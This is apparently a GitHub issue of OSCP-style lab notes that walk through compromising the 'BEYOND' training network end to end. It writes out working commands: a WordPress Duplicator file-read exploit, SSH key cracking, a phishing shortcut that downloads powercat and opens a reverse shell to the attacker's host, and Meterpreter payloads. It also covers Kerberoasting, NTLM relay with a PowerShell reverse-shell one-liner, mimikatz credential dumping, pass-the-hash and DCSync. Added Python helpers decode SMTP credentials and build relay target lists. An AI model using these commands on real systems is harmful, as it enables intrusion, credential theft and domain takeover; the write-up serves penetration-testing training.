WDavid404 opened this issue 7 months ago
Environment: two servers (MAILSRV1 and WEBSRV1) sit on the public network and are reachable from our Kali machine.
Port-scan the servers one at a time.
sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
## -oN to create an output file containing the scan results.
## -sC to use Nmap's default scripts
Checked hMailServer against known CVEs ==> nothing useful.
Next, enumerate the IIS web server: browse the site first, then try to identify directories and files with gobuster.
kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
==> nothing useful
Full scan output:
nmap -sV -sC -oN mailsrv1.txt 192.168.188.242
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:01 EST
Nmap scan report for 192.168.188.242
Host is up (0.27s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd ==> hMailServer!
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0 ==> Noted!
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: QUOTA ACL RIGHTS=texkA0001 IMAP4rev1 IDLE completed CAPABILITY IMAP4 OK CHILDREN NAMESPACE SORT
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
2160/tcp filtered apc-2160
Service Info: Host: MAILSRV1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-29T12:03:01
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.29 seconds
==> Look up hMailServer on CVE Details: https://www.cvedetails.com/vulnerability-list/vendor_id-8442/product_id-14780/Hmailserver-Hmailserver.html
nmap -sV -sC -oN websvr1.txt 192.168.188.244
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:07 EST
Nmap scan report for 192.168.188.244
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:c8:5e:cd:62:a0:78:b4:6e:d8:dd:0e:0b:8b:3a:4c (ECDSA)
|_ 256 8d:6d:ff:a4:98:57:82:95:32:82:64:53:b2:d7:be:44 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: WordPress 6.0.2
| http-title: BEYOND Finances – We provide financial freedom
|_Requested resource was http://192.168.188.244/main/
|_http-server-header: Apache/2.4.52 (Ubuntu)
1121/tcp filtered rmpp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
==> View page source ---> it uses WordPress (also shown by the http-generator header above)
wpscan --url http://192.168.188.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
cat websrv1/wpscan | grep -i "The version is out of date" -B4
Look up each of these plugins with searchsploit; only Duplicator and Elementor have exploit modules. ![image](https://github.com/WDavid404/OSCP/assets/137129330/36335f3d-ba61-46d0-add1-5a7dc5ab995
Use searchsploit -x <module name> to read each one; the Duplicator exploit is the usable one. Use 50420.py:
searchsploit -m 50420.py
python3 50420.py http://192.168.188.244 /etc/passwd
==> works, and reveals two users: daniela and marcus
# Grab a user's private key (/home/<user>/.ssh/id_rsa)
python3 50420.py http://192.168.188.244 /home/daniela/.ssh/id_rsa
==> copy the key into a local file id_rsa (don't forget to set permissions: chmod 600 id_rsa)
Try to SSH into websrv1 with the key:
ssh -i ./id_rsa daniela@192.168.188.244
Enter passphrase for key './id_rsa':
==> crack the SSH key passphrase. https://github.com/WDavid404/OSCP/issues/16#issuecomment-1891230625
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
# cracked passphrase: tequieromucho
SSH login succeeds with the cracked passphrase!
daniela@websrv1:~$ ip a
This host has no interface on the internal network.
On WEBSRV1, run linPEAS.sh for automated enumeration (tool: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
Fetch it from Kali, make it executable and run it:
daniela@websrv1:~$ wget -qc http://192.168.45.204:9000/linpeas.sh
daniela@websrv1:~$ chmod a+x ./linpeas.sh
daniela@websrv1:~$ ./linpeas.sh
The section worth attention is "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d". Use its findings to escalate to root; once root, search the Git repository for sensitive information first.
root@websrv1:/home/daniela# cd /srv/www/wordpress/
root@websrv1:/srv/www/wordpress# git status
HEAD detached at 612ff57
nothing to commit, working tree clean
root@websrv1:/srv/www/wordpress# git log
commit 612ff5783cc5dbd1e0e008523dba83374a84aaf1 (HEAD -> master)
Author: root <root@websrv1>
Date: Tue Sep 27 14:26:15 2022 +0000
Removed staging script and internal network access
commit f82147bb0877fa6b5d8e80cf33da7b8f757d11dd
Author: root <root@websrv1>
Date: Tue Sep 27 14:24:28 2022 +0000
initial commit
root@websrv1:/srv/www/wordpress# git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1
==> john's credentials are recovered from the diff.
crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success
==> MAILSRV1 is a domain-joined machine and we have identified a valid set of domain credentials for john.
This gives us two options:
1. use john's credentials directly against MAILSRV1 (e.g. its SMB shares);
2. prepare a malicious attachment and send a phishing email as john to daniela and marcus.
Trying the first option:
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
---> nothing useful
So we fall back to the second option: send a phishing email as john to daniela and marcus.
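Reading two commits by hand is fine here, but in a real repository you want every removed line checked for credential-shaped assignments, because a commit that "removes" a script leaves its content in history. The following Python scanner is an added example, not part of the original notes; it parses the unified diff printed by `git show <commit>` or `git log -p`, and is run here on a constructed diff whose paths, hostnames and values are made up and are not the contents of the websrv1 repository.

```python
"""Flag credential-looking assignments on the *removed* side of a unified diff.

Removed lines of `git show <commit>` / `git log -p` are where secrets that were
"cleaned up" in a later commit still live.
"""
import re
from typing import Dict, List

# Key names that usually carry a secret; extend to taste.
_SECRET_KEY = (
    r"[A-Za-z0-9_]*(?:pass(?:word|wd)?|pwd|secret|token|api[_-]?key|"
    r"cred(?:ential)?s?)[A-Za-z0-9_]*"
)
# shell / ini / yaml style:  KEY="value", key: value, KEY=value
_ASSIGN = re.compile(rf"(?i)\b(?P<key>{_SECRET_KEY})\s*[=:]\s*[\"']?(?P<val>[^\"'\s]+)")
# PHP style:  define( 'KEY', 'value' )
_DEFINE = re.compile(
    rf"(?i)define\(\s*[\"'](?P<key>{_SECRET_KEY})[\"']\s*,\s*[\"'](?P<val>[^\"']+)[\"']"
)

# Constructed sample diff (not the contents of the websrv1 repository).
SAMPLE_DIFF = """\
diff --git a/staging.sh b/staging.sh
deleted file mode 100644
--- a/staging.sh
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/bash
-# sync the site to the internal staging host
-STAGING_HOST="staging.example.test"
-STAGING_USER="svc_staging"
-STAGING_PASS="Fake-Staging-Passw0rd!"
-rsync -a /srv/www/wordpress/ "$STAGING_USER@$STAGING_HOST:/var/www/"
diff --git a/wp-config.php b/wp-config.php
--- a/wp-config.php
+++ b/wp-config.php
@@ -20,7 +20,7 @@
 define( 'DB_NAME', 'wordpress' );
 define( 'DB_USER', 'wp' );
-define( 'DB_PASSWORD', 'FakeDbPassw0rd' );
+define( 'DB_PASSWORD', getenv('WP_DB_PASSWORD') );
 define( 'DB_HOST', 'localhost' );
"""


def removed_secrets(diff_text: str) -> List[Dict[str, str]]:
    """Return [{file, key, value}] for every removed line that assigns a
    secret-looking key.  `file` is the pre-image path (the side the line was
    removed from).  Context lines, added lines and hunk headers are ignored."""
    hits: List[Dict[str, str]] = []
    current = ""
    for line in diff_text.splitlines():
        if line.startswith("--- "):          # pre-image file header
            path = line[4:]
            current = path[2:] if path.startswith("a/") else path
            continue
        if line.startswith("+++ ") or line.startswith("@@") or not line.startswith("-"):
            continue
        content = line[1:]                   # strip the leading "-"
        m = _DEFINE.search(content) or _ASSIGN.search(content)
        if m:
            hits.append({"file": current, "key": m["key"], "value": m["val"]})
    return hits
```

Pipe the repository history in with `git -C /srv/www/wordpress log -p --all | python3 -c 'import sys; ...'`, or call `removed_secrets()` on the output of `git show <commit>`; every hit names the file the line was removed from, so you know where the credential was used.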
1. Set up a WebDAV share on Kali:
kali@kali:~$ mkdir /home/kali/beyond/webdav
kali@kali:~$ /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
Hard lesson learned: WebDAV must listen on port 80, otherwise the later steps do not work!
2. Log in to a Windows PC to build the Windows Library file (config.Library-ms) and the shortcut file.
Connect to WINPREP via RDP as offsec with the password lab in order to prepare the Windows Library and shortcut files.
<?xml version="1.0" encoding="UTF-8"?>
Note: the contents of config.Library-ms change after it is saved to Kali; restore them manually.
On the Windows PC's desktop, create a new shortcut (the name, e.g. configuration, does not matter).
Set the shortcut target to the command below, then copy the shortcut into Kali's WebDAV directory (double-clicking the config file opens that WebDAV directory):
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:9000/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"
--> this downloads powercat.ps1 from Kali's port 9000 (the http.server port), runs it and sends a reverse shell back to Kali's port 4444.
Prepare on Kali:
- place powercat.ps1 in the webdav directory (from /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1)
_Hard lesson learned: the powercat.ps1 downloaded from the internet did not work; use the copy on Kali instead: find / -name powercat.ps1 2>/dev/null_
- in the webdav directory: python3 -m http.server 9000
- nc -lvp 4444
- a body.txt file with arbitrary content.
Then:
kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john
Password: dqsTwTpZPn#nL
=== Trying 192.168.50.242:25...
=== Connected to 192.168.50.242.
<- 220 MAILSRV1 ESMTP
-> EHLO kali
<- 250-MAILSRV1
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> am9obg==
<- 334 UGFzc3dvcmQ6
-> ZHFzVHdUcFpQbiNuTA==
<- 235 authenticated.
-> MAIL FROM:john@beyond.com
<- 250 OK
-> RCPT TO:marcus@beyond.com
<- 250 OK
-> DATA
<- 354 OK, send.
-> 36 lines sent
<- 250 Queued (1.088 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
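The swaks trace shows what AUTH LOGIN actually puts on the wire: two Base64 tokens and no TLS, so anyone on the path to tcp/25 (a capture, a proxy log) gets john's password back with a single decode. The Python snippet below is an added example, not part of the original write-up; it parses a swaks-style transcript and recovers the credentials. The transcript constant is the swaks output from this page, and the parser also accepts the RFC 4954 initial-response form (`AUTH LOGIN <base64 user>`), which is an assumption about other clients rather than something swaks emitted here.

```python
"""Recover credentials from an SMTP AUTH LOGIN exchange in a session transcript.

AUTH LOGIN only Base64-encodes the username and password.  Without STARTTLS the
server on tcp/25 receives them in the clear, so a packet capture or a client
trace like the swaks output above is enough to recover them.
"""
import base64
import re
from typing import Dict, List, Optional

# swaks marks server lines with "<-" and client lines with "->".
_LINE = re.compile(r"^(?P<dir>->|<-)\s+(?P<text>.*)$")

# The swaks trace from this page (direction markers and protocol text only).
SWAKS_TRANSCRIPT = """\
<- 220 MAILSRV1 ESMTP
-> EHLO kali
<- 250-MAILSRV1
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> am9obg==
<- 334 UGFzc3dvcmQ6
-> ZHFzVHdUcFpQbiNuTA==
<- 235 authenticated.
-> MAIL FROM:john@beyond.com
<- 250 OK
"""


def _decode(token: str) -> str:
    """Decode one AUTH token; AUTH LOGIN tokens are Base64 of UTF-8 text."""
    return base64.b64decode(token, validate=True).decode("utf-8")


def recover_auth_login(transcript: str) -> Optional[Dict[str, object]]:
    """Return username, password and outcome of the first AUTH LOGIN exchange,
    or None if the transcript holds no complete AUTH LOGIN exchange."""
    msgs = [m for m in (_LINE.match(raw.strip()) for raw in transcript.splitlines()) if m]
    for i, m in enumerate(msgs):
        parts = m["text"].split()
        if m["dir"] != "->" or [p.upper() for p in parts[:2]] != ["AUTH", "LOGIN"]:
            continue
        # RFC 4954 initial-response form: "AUTH LOGIN <base64 user>"
        answers: List[str] = parts[2:3]
        authenticated = False
        for n in msgs[i + 1:]:
            if n["dir"] == "->":
                answers.append(n["text"])      # reply to a 334 challenge
                continue
            code = n["text"][:3]
            if code == "334":                  # "Username:" / "Password:" prompt
                continue
            authenticated = code == "235"      # 235 = success, 535 = failure
            break
        if len(answers) != 2:
            return None
        return {
            "username": _decode(answers[0]),
            "password": _decode(answers[1]),
            "authenticated": authenticated,
        }
    return None
```

The same logic applies to a Wireshark "Follow TCP Stream" dump once the direction markers are added; the fix on the server side is to require STARTTLS (or offer AUTH only on 465/587 with TLS) so AUTH LOGIN never runs over a plaintext session.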
nc receives a reverse shell from an internal PC (CLIENTWK1, IP 172.16.74.243).
### Enumerate CLIENTWK1 with winPEAS
Prepare winPEAS on Kali (download winPEASx64.exe from https://github.com/carlospolop/PEASS-ng/releases/tag/20240226-e0f9d47b).
PS C:\Windows\System32\WindowsPowerShell\v1.0> cd C:\Users\marcus
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/winPEASx64.exe -Outfile winPEAS.exe
PS C:\Users\marcus> .\winPEAS.exe
...
Check the following sections:
- AV Information (is an AV product active?)
- Network Ifaces and known hosts
- DNS cached
### Enumerate CLIENTWK1 with SharpHound
On Kali: cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
On CLIENTWK1:
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/SharpHound.ps1 -Outfile SharpHound.ps1
PS C:\Users\marcus> powershell -ep bypass
PS C:\Users\marcus> . .\SharpHound.ps1
PS C:\Users\marcus> Invoke-BloodHound -CollectionMethod All
Analysing the results in BloodHound gives the following:
1.
![image](https://github.com/WDavid404/OSCP/assets/137129330/3706e113-d721-49bf-a395-67841f12f4a9)
2. The SPN for daniela is http/internalsrv1.beyond.com
3. beccy is a domain administrator and has an active session on MAILSRV1
Then set up a SOCKS5 proxy to perform network enumeration via Nmap and CrackMapExec in order to identify accessible services, open ports, and SMB settings. First generate a Meterpreter payload:
kali@kali:~/beyond$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.204 LPORT=443 -f exe -o met.exe
Start a multi/handler listener with the corresponding settings in Metasploit:
kali@kali:~/beyond$ sudo msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.45.204
LHOST => 192.168.45.204
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
ExitOnSession false keeps the listener active for new sessions, so it does not have to be restarted for every incoming connection.
On CLIENTWK1:
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe
PS C:\Users\marcus> .\met.exe
In Metasploit, a new session should appear:
`[*] Meterpreter session 1 opened (192.168.119.5:443 -> 192.168.50.242:64234) at 2022-10-11 07:05:22 -0400`
Once session 1 is opened, we can use multi/manage/autoroute and auxiliary/server/socks_proxy to create a SOCKS5 proxy into the internal network.
msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
...
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 2.
Confirm the proxychains SOCKS5 configuration:
kali@kali:~/beyond$ cat /etc/proxychains4.conf
...
socks5 127.0.0.1 1080
Scan the internal hosts with crackmapexec:
kali@kali:~/beyond$ proxychains -q crackmapexec smb 172.16.74.240-241 172.16.74.244 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares
Results:
1. john doesn't have actionable or interesting permissions on any of the discovered shares
2. MAILSRV1 and INTERNALSRV1 have SMB signing set to False --> without this protection we can potentially perform relay attacks if we can force an authentication request.
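The "signing:False" result is what makes the later relay possible: NTLM authentication captured from one host can only be relayed to SMB on a host that does not require signing, and it cannot be reflected back to the host it came from. As an added example (not part of the original notes), the Python below turns the two sources of that information on this page, CrackMapExec's banner line and Nmap's smb2-security-mode script, into a target list in the format `ntlmrelayx -tf` accepts. The CrackMapExec lines are constructed to match the tool's format; the IPs follow the scan range above, but the OS strings and the 172.16.74.244 assignment for MAILSRV1 are assumptions. The Nmap snippet is the MAILSRV1 host-script output from the external scan above.

```python
"""Pick NTLM relay targets from SMB signing information.

Relaying NTLM to SMB only works against hosts that do not *require* signing.
CrackMapExec reports this as "(signing:False)" and Nmap's smb2-security-mode
script as "Message signing enabled but not required"; the helpers below parse
either and emit the target file for `ntlmrelayx -tf`.
"""
import re
from typing import Dict, List

# CrackMapExec banner line, e.g.
# SMB  172.16.74.240  445  DCSRV1  [*] Windows ... (name:DCSRV1) (domain:beyond.com) (signing:True) (SMBv1:False)
_CME = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+\S+\s+\[\*\].*\(signing:(?P<sig>True|False)\)"
)

# Constructed CrackMapExec output for the three internal servers named on this page.
CME_OUTPUT = """\
SMB         172.16.74.240   445    DCSRV1           [*] Windows Server 2022 Build 20348 x64 (name:DCSRV1) (domain:beyond.com) (signing:True) (SMBv1:False)
SMB         172.16.74.241   445    INTERNALSRV1     [*] Windows Server 2022 Build 20348 x64 (name:INTERNALSRV1) (domain:beyond.com) (signing:False) (SMBv1:False)
SMB         172.16.74.244   445    MAILSRV1         [*] Windows Server 2022 Build 20348 x64 (name:MAILSRV1) (domain:beyond.com) (signing:False) (SMBv1:False)
"""

# The MAILSRV1 host-script section from the external Nmap scan on this page.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.188.242
Host is up (0.27s latency).
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""


def smb_signing_from_cme(output: str) -> Dict[str, bool]:
    """Map host IP -> True if SMB signing is required, from CME banner lines."""
    required: Dict[str, bool] = {}
    for line in output.splitlines():
        m = _CME.match(line)
        if m:
            required[m["ip"]] = m["sig"] == "True"
    return required


def smb_signing_from_nmap(output: str) -> Dict[str, bool]:
    """Map host IP -> True if signing is required, from nmap smb2-security-mode."""
    required: Dict[str, bool] = {}
    host = ""
    for line in output.splitlines():
        m = re.match(r"Nmap scan report for .*?(\d{1,3}(?:\.\d{1,3}){3})", line)
        if m:
            host = m.group(1)
        elif host and "Message signing" in line:
            # nmap wording: "enabled and required" / "enabled but not required" / "disabled"
            required[host] = "and required" in line
    return required


def relay_targets(required: Dict[str, bool]) -> List[str]:
    """Hosts where signing is not required, i.e. candidate relay targets."""
    return sorted(ip for ip, req in required.items() if not req)


def targets_file(hosts: List[str]) -> str:
    """Content for `ntlmrelayx -tf targets.txt`: one smb:// URL per line."""
    return "".join(f"smb://{h}\n" for h in hosts)
```

Remove the host that will be coerced into authenticating (here INTERNALSRV1, via the WordPress plugin) from the list before writing the file; the relay must land on a different machine, which is why MAILSRV1 is the target later on this page. On the defensive side the same parsers give you the list of servers where `RequireSecuritySignature` still needs to be enforced by GPO.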
Scan the internal hosts with nmap (note: only TCP connect scans, -sT, work through proxychains):
kali@kali:~/beyond$ sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.74.240 172.16.74.241 172.16.74.243
==> 172.16.74.241 has ports 80 and 443 open
Use Chisel to reach the web server on 172.16.74.241:80.
Run Chisel in server mode on Kali to receive incoming connections on port 8080.
Download chisel into the current directory (https://github.com/jpillora/chisel/releases/tag/v1.9.1: the windows amd64 build and the linux build). For the Linux build:
kali@kali:~/beyond$ chmod a+x chisel
kali@kali:~/beyond$ ./chisel server -p 8080 --reverse
Upload the Windows chisel.exe to CLIENTWK1 with Meterpreter's upload command:
msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > upload chisel.exe C:\Users\marcus\chisel.exe
Now drop into a shell and run Chisel in client mode to connect back to our Kali machine on port 8080:
C:\Users\marcus> chisel.exe client 192.168.45.204:8080 R:80:172.16.74.241:80
Note: stop the WebDAV server on Kali first, since it is still bound to port 80, which the reverse tunnel needs.
A browser on Kali can now open http://127.0.0.1 and reach the web page of 172.16.74.241.
To reach http://127.0.0.1/wordpress/wp-admin, the site's configured hostname internalsrv1.beyond.com has to resolve to the tunnel, so add the following entry to /etc/hosts:
kali@kali:~/beyond$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
...
127.0.0.1 internalsrv1.beyond.com <--- this line
...
The wp-admin login page at http://127.0.0.1/wordpress/wp-admin accepts daniela's credentials (obtained below).
### Obtain daniela's credentials
kali@kali:~/beyond$ proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.74.240 beyond.com/john
--> this returns a TGS-REP (Kerberoast) hash for daniela; save it to daniela.hash and crack it:
kali@kali:~/beyond$ sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force
==> daniela's password is DANIelaRO123
Log in to http://127.0.0.1/wordpress/wp-admin as daniela:DANIelaRO123.
Open the WordPress Plugins page.
Click "Manage" under "Backup Migration".
On Kali, start ntlmrelayx:
kali@kali:~/beyond$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.188.242 -c "powershell -enc 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"
The encoded command corresponds to this one-liner:
$client = New-Object System.Net.Sockets.TCPClient("192.168.45.204",4448);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
On Kali, start nc -vlpn 4448 to catch the reverse shell.
In the Backup Migration plugin page, enter //192.168.45.204/test (the test directory does not need to exist on Kali) and click Save.
---> the nc -vlpn 4448 listener gets a shell on MAILSRV1.
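The `-enc` blob in the ntlmrelayx command above is the one-liner encoded as Base64 of UTF-16LE, not of UTF-8, which is why `echo "$cmd" | base64` produces something PowerShell rejects. The Python helpers below are an added example, not part of the original notes: they produce that encoding from a script, reverse it, and give a quick triage check for spotting `-enc` arguments in process-creation logs. The sample command in the check is constructed; the one-liner from this page can be passed to `to_encoded_command()` unchanged.

```python
"""Build and unpack PowerShell -EncodedCommand (-enc) arguments.

-enc takes Base64 of the script's UTF-16LE bytes.  That encoding also makes the
blobs easy to recognise in logs: after decoding, every other byte of an ASCII
script is 0x00.
"""
import base64
import binascii


def to_encoded_command(script: str) -> str:
    """Return the Base64(UTF-16LE) form PowerShell expects after -enc."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def from_encoded_command(blob: str) -> str:
    """Inverse of to_encoded_command; raises on malformed input."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def looks_like_encoded_command(token: str) -> bool:
    """Heuristic for log triage: does this token decode to a plausible -enc script?

    Accepts only strict Base64 of an even number of bytes whose UTF-16LE text is
    printable ASCII (plus line breaks and tabs).  Plain Base64 of ASCII text,
    such as the SMTP AUTH LOGIN tokens seen earlier on this page, decodes to
    non-ASCII UTF-16 and is rejected.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False
    if not raw or len(raw) % 2:
        return False
    try:
        text = raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return False
    return text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text)
```

For the relay step, `"powershell -enc " + to_encoded_command(one_liner)` rebuilds the `-c` argument; on the blue-team side, run `from_encoded_command()` over every 4688/Sysmon command line where `looks_like_encoded_command()` fires to see what was actually executed.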
PS C:\Windows\system32> cd C:\Users\Administrator
PS C:\Users\Administrator> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe
PS C:\Users\Administrator> .\met.exe
In Kali Metasploit, we should receive a new incoming session.
[*] Sending stage (200774 bytes) to 192.168.50.242
[*] Meterpreter session 2 opened (192.168.119.5:443 -> 192.168.50.242:50814)
msf6 post(multi/manage/autoroute) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator> powershell
Next, download the current Mimikatz version on Kali and serve it via our Python3 web server on port 9000. On MAILSRV1, download Mimikatz with iwr and launch it. Mimikatz location on Kali: /usr/share/windows-resources/mimikatz/x64/mimikatz.exe (version mimikatz 2.2.0 (x64) #19041). ⚠️ Don't download mimikatz from GitHub: with that build sekurlsa::logonpasswords fails with ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
PS C:\Users\Administrator> iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
Note: if iwr is reported as an unrecognized command, check that PowerShell has been started; iwr is a PowerShell command.
PS C:\Users\Administrator> .\mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
==> beccy's NTLM hash and cleartext password are obtained.
Note:
running mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator on MAILSRV1 returns nothing
--> because the account we hold on MAILSRV1 (daniela, via the relay) is not a domain administrator.
kali@kali:~$ proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.74.240
Once on the DC, transfer mimikatz with iwr (better: transfer met.exe first and work from a Meterpreter session):
powershell
iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
PS C:\Users\Administrator> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator
## For fun:
## `lsadump::dcsync /domain:beyond.com /all` dumps the NTLM hashes of all domain users